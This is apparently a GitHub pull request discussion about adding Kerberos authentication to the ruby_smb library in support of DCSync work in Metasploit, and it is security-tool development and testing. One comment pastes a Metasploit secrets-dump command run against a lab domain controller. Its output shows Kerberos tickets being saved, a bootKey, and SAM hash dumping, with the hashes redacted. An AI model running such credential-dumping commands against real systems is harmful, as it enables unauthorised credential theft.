Closed smashery closed 9 months ago
Thanks for the review @cdelefuente-r7. Agreed regarding having the Kerberos functionality available here. I wonder whether it would be worth a refactoring job to pull it out into either here, or a separate repo? I think I've addressed the comments - let me know if there's anything else needed.
Thanks for updating this @smashery! Everything looks good to me know. I retested and confirmed the signature verification issue is fixed now. Adding Kerberos functionality would be great, but it would require a lot of refactoring and changes. I think your solution is the best for now. That being said, I keep this idea in mind for a future enhancement.
@cdelafuente-r7 I opened a PR implemented the changes you requested here https://github.com/smashery/ruby_smb/pull/1. Give it a look and let me know what you think
Tested this with the Metasploit side of things and it's all looking good to me now!
Thanks for your work on this Smashery, this is a great improvement!
msf6 auxiliary(gather/windows_secrets_dump) > run DOMAIN=msflab.local SMB::Auth=kerberos SMB::Rhostname=dc.msflab.local DomainControllerRhost=192.168.159.10
[*] Running module against 192.168.159.10
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_191490.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_964676.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Retrieving target system bootKey
[+] 192.168.159.10:445 - bootKey: 0x369c37bc5ec5e4b3eaeee7b69caf5d6a
[*] 192.168.159.10:445 - Saving remote SAM database
[*] 192.168.159.10:445 - Dumping SAM hashes
[*] 192.168.159.10:445 - Password hints:
No users with password hints on this system
[*] 192.168.159.10:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
... cut because secrets
This PR supports the kerberos-in-DCSync work in the Metasploit repo (see: https://github.com/rapid7/metasploit-framework/pull/18419). Test cases are listed in that PR, and should exercise all of the changes in this PR.